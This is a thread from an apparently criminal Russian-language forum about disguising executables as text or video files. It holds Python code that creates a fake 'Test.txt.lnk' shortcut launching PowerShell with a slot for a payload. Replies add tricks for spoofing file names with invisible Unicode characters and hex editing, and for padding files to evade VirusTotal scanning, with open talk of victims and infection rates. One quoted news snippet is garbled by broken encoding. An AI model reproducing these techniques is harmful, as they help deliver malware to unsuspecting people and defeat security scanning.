What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Маскируем .exe в txt документ или mp4 медиа

dunkel

Light Weight
Депозит
$0
Народная open source альтернатива (с вас 5000 EUR):
Python: Скопировать в буфер обмена
Code:
#pip install pywin32 winshell
import os
import winshell
from win32com.client import Dispatch

# Определяем путь к .lnk файлу
desktop = winshell.desktop()
path = os.path.join(desktop, "Test.txt.lnk")

# Создаем ссылку на Shell объект
shell = Dispatch('WScript.Shell')

# Создаем ярлык
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = "powershell.exe"
shortcut.Arguments = "-Command \"ping -r google.com\"" #Здесь powershell payload например
shortcut.WorkingDirectory = os.getenv("USERPROFILE")
shortcut.IconLocation = "powershell.exe, 0" #Иконку можете сменить на любую здесь или через ResourceHacker
shortcut.save()

Маскируем .exe в txt документ или медиа.mp4

Посмотреть и скачать с Яндекс Диска
disk.yandex.ru
disk.yandex.ru
 
Voruem сказал(а):
можно просто иконку сменить)))
Нажмите, чтобы раскрыть...
Смотреть на расширение файла это базовый навык и это делают все, тем более кто работает с доками в корпах и офисах, их этому учат.
А спуфнуть расширение занимает минуту и повышает конверсию отстуков
 
m00r сказал(а):
продавец забанен хз за что

Нажмите, чтобы раскрыть...
Ой я не знал, ну он не продается уже, кряк в видео просто для примера, автоматизирует эту технику
Можно самому в ручную сделать или скрипт накидать, кому интересно почитать как это работает https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps
 
dunkel сказал(а):
Смотреть на расширение файла это базовый навык и это делают все, тем более кто работает с доками в корпах и офисах, их этому учат
Нажмите, чтобы раскрыть...
а ещё бы я добавил :
1 - ЯРЛЫК у файла .
2 - МЕССЕДЖ при наведении мышки указывающий на повершелл 😆 😆 😆
3 - ни разу не палево )
 
Bard сказал(а):
а ещё бы я добавил :
1 - ЯРЛЫК у файла .
2 - МЕССЕДЖ при наведении мышки указывающий на повершелл 😆 😆 😆
3 - ни разу не палево )

Посмотреть вложение 90567
Нажмите, чтобы раскрыть...
Ну если 0day найду в блокноте или медиа плеере, сразу об этом топик создам, а пока так двигаемся.
 
Ссылки убрал, я поддерживаю копирайт и не рекомендую искать и скачивать PrivateQuantumBuilder_20240110
 
Добавлю в тему U+205F так как способ и сейчас работает в архиве, копируем тыц ;)



Жертва как правило видит всего три точки сама тема тут тыц ;)
 
в архиве можно спуфнуть название и тд через hex редактор;)
 
Adderall сказал(а):
dokazhi obratnoe dam 100 $
Нажмите, чтобы раскрыть...

ÐбнаÑÑжена RCE-ÑÑзвимоÑÑÑ Ð² пÑиложении ÐÐ»Ð¾ÐºÐ½Ð¾Ñ Windows

ÐÑÑледоваÑÐµÐ»Ñ Ð² облаÑÑи безопаÑноÑÑи ТÑÐ²Ð¸Ñ ÐÑманди, ÑабоÑаÑÑий Ñ Ð¿ÑоекÑом Google Project Zero, обнаÑÑжил ÑÑзвимоÑÑÑ Ð² ÑекÑÑовом ÑедакÑоÑе «ÐлокноÑ» Ð¾Ñ Microsoft. Ðо Ñловам ÑкÑпеÑÑа, ÑÑа пÑоблема...
habr.com
habr.com

$100 сюда: 1dprEpsBVpjXfiaBtwyFp5X7Dtfs5VVR1
 
jazet сказал(а):
я просто слышал что размер вроде можно изменить
Нажмите, чтобы раскрыть...
Размер увеличивается пампом, а не в hex редакторе
Если памп однотипными повторяющимися данными с низкой энтропией, алгоритм сжимает их до пары байт, и файл 1мб распампленный до 700мб (лимит загрузки на VT 650мбайт) будет весить в допустим запароленном архиве 1мб
 
Добавлю в тему U+205F
Нажмите, чтобы раскрыть...
Можно кстати название файла и название папки без имени сделать alt+0160
 
Top